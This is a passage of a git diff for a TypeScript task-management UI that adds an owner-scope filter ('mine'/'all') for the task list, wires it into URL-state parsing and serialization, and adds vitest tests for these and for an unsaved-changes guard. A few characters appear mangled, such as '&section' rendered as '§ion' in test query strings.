expect } from 'vitest'; +import { filterTasksByScope } from './taskScope'; + +const tasks = [ + { id: 1, ownerId: 'alice' }, + { id: 2, ownerId: 'bob' }, + { id: 3, ownerId: 'alice' }, + { id: 4, ownerId: null }, // legacy no-auth row + { id: 5 }, // ownerId undefined +]; + +describe('filterTasksByScope', () => { + it("scope='mine' keeps only the current user's tasks", () => { + expect(filterTasksByScope(tasks, 'mine', 'alice').map(t => t.id)).toEqual([1, 3]); + }); + + it("scope='all' returns everything", () => { + expect(filterTasksByScope(tasks, 'all', 'alice')).toHaveLength(5); + }); + + it('no current user (auth disabled) returns everything even for mine', () => { + expect(filterTasksByScope(tasks, 'mine', null)).toHaveLength(5); + }); + + it('legacy null/undefined owners never match mine', () => { + expect(filterTasksByScope(tasks, 'mine', 'bob').map(t => t.id)).toEqual([2]); + }); +}); diff --git a/ui/src/lib/taskScope.ts b/ui/src/lib/taskScope.ts new file mode 100644 index 0000000..0a3f8b5 --- /dev/null +++ b/ui/src/lib/taskScope.ts @@ -0,0 +1,21 @@ +/** + * taskScope.ts — タスク一覧の所有者スコープフィルタ。 + * + * visibility (public / org) のせいで他ユーザーのタスクが一覧に混ざり + * 「自分のタスクを見失う」問題への対策。'mine' は ownerId が自分のものだけを + * 残す。認証無効時 (currentUserId が無い時) はフィルタ自体が無意味なので + * 全件を返す。 + */ + +export type TaskScope = 'mine' | 'all'; + +export const TASK_SCOPES: TaskScope[] = ['mine', 'all']; + +export function filterTasksByScope( + tasks: T[], + scope: TaskScope, + currentUserId: string | null, +): T[] { + if (scope !== 'mine' || !currentUserId) return tasks; + return tasks.filter(t => t.ownerId === currentUserId); +} diff --git a/ui/src/lib/unsavedGuard.test.ts b/ui/src/lib/unsavedGuard.test.ts new file mode 100644 index 0000000..495dea6 --- /dev/null +++ b/ui/src/lib/unsavedGuard.test.ts @@ -0,0 +1,26 @@ +// NOTE: useUnsavedGuard (the React hook) needs a component render and a DOM, +// neither of which exist in this node test environment — so the dirty-state +// paths cannot be registered here. These tests cover the module's exported +// behavior with an empty checker registry, including that window.confirm is +// NOT shown when nothing is dirty. +import { describe, it, expect, vi, afterEach } from 'vitest'; +import { hasUnsavedChanges, confirmDiscardUnsaved } from './unsavedGuard'; + +afterEach(() => { + vi.unstubAllGlobals(); +}); + +describe('hasUnsavedChanges', () => { + it('is false when no view registered a checker', () => { + expect(hasUnsavedChanges()).toBe(false); + }); +}); + +describe('confirmDiscardUnsaved', () => { + it('proceeds without prompting when nothing is dirty', () => { + const confirm = vi.fn().mockReturnValue(false); + vi.stubGlobal('window', { confirm }); + expect(confirmDiscardUnsaved()).toBe(true); + expect(confirm).not.toHaveBeenCalled(); + }); +}); diff --git a/ui/src/lib/urlState.test.ts b/ui/src/lib/urlState.test.ts new file mode 100644 index 0000000..6c04668 --- /dev/null +++ b/ui/src/lib/urlState.test.ts @@ -0,0 +1,203 @@ +import { describe, it, expect, vi, afterEach } from 'vitest'; +import { + readUiUrlState, + buildUiUrlStateSearch, + paramsEqualExcept, + COLUMN_LABELS, + COLUMN_LIST, + type UiUrlState, +} from './urlState'; + +const DEFAULT_STATE: UiUrlState = { + page: 'tasks', + repo: '', + status: 'all', + search: '', + sort: 'updated', + scope: 'mine', + detailTab: 'overview', + mobileTab: 'chat', + taskId: null, +}; + +function stubLocation(search: string) { + vi.stubGlobal('window', { location: { search } }); +} + +afterEach(() => vi.unstubAllGlobals()); + +describe('readUiUrlState', () => { + it('returns defaults when window is undefined (SSR/node)', () => { + // node environment: no window global by default + expect(readUiUrlState()).toEqual(DEFAULT_STATE); + }); + + it('returns defaults for an empty query string', () => { + stubLocation(''); + const state = readUiUrlState(); + expect(state).toEqual({ + ...DEFAULT_STATE, + section: undefined, + piece: undefined, + }); + }); + + it('parses every valid parameter', () => { + stubLocation( + '?page=settings&repo=local%2Ftask-1&status=running&q=hello&sort=title' + + '&tab=files&mobileTab=activity&task=42§ion=auth&piece=chat' + + '&pieceSource=user-custom&dashboardWidget=gpu&help=intro', + ); + const state = readUiUrlState(); + expect(state.page).toBe('settings'); + expect(state.repo).toBe('local/task-1'); + expect(state.status).toBe('running'); + expect(state.search).toBe('hello'); + expect(state.sort).toBe('title'); + expect(state.detailTab).toBe('files'); + expect(state.mobileTab).toBe('activity'); + expect(state.taskId).toBe(42); + expect(state.section).toBe('auth'); + expect(state.piece).toBe('chat'); + expect(state.pieceSource).toBe('user-custom'); + expect(state.dashboardWidget).toBe('gpu'); + expect(state.help).toBe('intro'); + }); + + it('falls back to defaults on invalid enum values', () => { + stubLocation('?page=bogus&status=bogus&sort=bogus&tab=bogus&mobileTab=bogus§ion=bogus&pieceSource=bogus'); + const state = readUiUrlState(); + expect(state.page).toBe('tasks'); + expect(state.status).toBe('all'); + expect(state.sort).toBe('updated'); + expect(state.detailTab).toBe('overview'); + expect(state.mobileTab).toBe('chat'); + expect(state.section).toBeUndefined(); + expect(state.pieceSource).toBeUndefined(); + }); + + it('rejects non-positive and non-numeric task ids', () => { + for (const task of ['0', '-5', 'abc', '']) { + stubLocation(`?task=${task}`); + expect(readUiUrlState().taskId).toBeNull(); + } + stubLocation('?task=7'); + expect(readUiUrlState().taskId).toBe(7); + }); + + it('still parses legacy settings section ids (soft bookmark landing)', () => { + for (const legacy of ['gateway-keys', 'provider', 'workspace', 'browser-sessions']) { + stubLocation(`?section=${legacy}`); + expect(readUiUrlState().section).toBe(legacy); + } + }); + + it('treats an empty piece param as undefined', () => { + stubLocation('?piece='); + expect(readUiUrlState().piece).toBeUndefined(); + }); + + it('omits optional spread keys entirely when their params are absent', () => { + stubLocation('?page=tasks'); + const state = readUiUrlState(); + expect('pieceSource' in state).toBe(false); + expect('dashboardWidget' in state).toBe(false); + expect('help' in state).toBe(false); + }); +}); + +describe('buildUiUrlStateSearch', () => { + it('produces an empty string for the default state', () => { + expect(buildUiUrlStateSearch(DEFAULT_STATE)).toBe(''); + }); + + it('only serializes non-default values', () => { + const search = buildUiUrlStateSearch({ + ...DEFAULT_STATE, + status: 'failed', + taskId: 12, + }); + const params = new URLSearchParams(search); + expect(params.get('status')).toBe('failed'); + expect(params.get('task')).toBe('12'); + expect(Array.from(params.keys()).sort()).toEqual(['status', 'task']); + }); + + it('omits the default dashboardWidget (worker-status) but keeps others', () => { + expect( + buildUiUrlStateSearch({ ...DEFAULT_STATE, dashboardWidget: 'worker-status' }), + ).toBe(''); + expect( + buildUiUrlStateSearch({ ...DEFAULT_STATE, dashboardWidget: 'gpu' }), + ).toBe('dashboardWidget=gpu'); + }); + + it('round-trips through readUiUrlState', () => { + const state: UiUrlState = { + page: 'help', + repo: 'local/task-9', + status: 'waiting_human', + search: 'foo bar', + sort: 'status', + scope: 'all', + detailTab: 'trace', + mobileTab: 'files', + taskId: 99, + section: 'reflection', + piece: 'research', + pieceSource: 'builtin', + dashboardWidget: 'queue', + help: 'pieces', + }; + stubLocation(`?${buildUiUrlStateSearch(state)}`); + expect(readUiUrlState()).toEqual(state); + }); +}); + +describe('paramsEqualExcept', () => { + it('considers identical params equal', () => { + const a = new URLSearchParams('a=1&b=2'); + const b = new URLSearchParams('a=1&b=2'); + expect(paramsEqualExcept(a, b, [])).toBe(true); + }); + + it('ignores key order', () => { + const a = new URLSearchParams('b=2&a=1'); + const b = new URLSearchParams('a=1&b=2'); + expect(paramsEqualExcept(a, b, [])).toBe(true); + }); + + it('detects value differences', () => { + const a = new URLSearchParams('a=1'); + const b = new URLSearchParams('a=2'); + expect(paramsEqualExcept(a, b, [])).toBe(false); + }); + + it('skips ignored keys on either side', () => { + const a = new URLSearchParams('a=1&tab=files'); + const b = new URLSearchParams('a=1&tab=trace'); + expect(paramsEqualExcept(a, b, ['tab'])).toBe(true); + const c = new URLSearchParams('a=1'); + expect(paramsEqualExcept(a, c, ['tab'])).toBe(true); + }); + + it('detects extra non-ignored keys', () => { + const a = new URLSearchParams('a=1&extra=x'); + const b = new URLSearchParams('a=1'); + expect(paramsEqualExcept(a, b, [])).toBe(false); + }); + + it('handles repeated keys deterministically', () => { + const a = new URLSearchParams('k=2&k=1'); + const b = new URLSearchParams('k=1&k=2'); + expect(paramsEqualExcept(a, b, [])).toBe(true); + }); +}); + +describe('column constants', () => { + it('every status column has a label', () => { + for (const col of COLUMN_LIST) { + expect(COLUMN_LABELS[col], `label for ${col}`).toBeTruthy(); + } + }); +}); diff --git a/ui/src/lib/urlState.ts b/ui/src/lib/urlState.ts index dfc55a8..6f05a40 100644 --- a/ui/src/lib/urlState.ts +++ b/ui/src/lib/urlState.ts @@ -76,6 +76,8 @@ export interface UiUrlState { status: 'all' | StatusColumn; search: string; sort: SortMode; + /** Owner scope for the task list. 'mine' = own tasks only (default when auth is on). */ + scope: 'mine' | 'all'; detailTab: DetailTabId; mobileTab: MobileTabId; taskId: number | null; @@ -97,6 +99,7 @@ export function readUiUrlState(): UiUrlState { status: 'all', search: '', sort: 'updated', + scope: 'mine', detailTab: 'overview', mobileTab: 'chat', taskId: null, @@ -128,6 +131,7 @@ export function readUiUrlState(): UiUrlState { : 'all', search: params.get('q') ?? '', sort: sort && SORT_MODES.includes(sort as SortMode) ? sort as SortMode : 'updated', + scope: params.get('scope') === 'all' ? 'all' : 'mine', detailTab: detailTab && DETAIL_TABS.includes(detailTab as DetailTabId) ? detailTab as DetailTabId : 'overview', @@ -150,6 +154,7 @@ export function buildUiUrlStateSearch(state: UiUrlState): string { if (state.status !== 'all') params.set('status', state.status); if (state.search) params.set('q', state.search); if (state.sort !== 'updated') params.set('sort', state.sort); + if (state.scope === 'all') params.set('scope', 'all'); if (state.detailTab !== 'overview') params.set('tab', state.detailTab); if (state.mobileTab !== 'chat') params.set('mobileTab', state.mobileTab); if (state.taskId) params.set('task', String(state.taskId));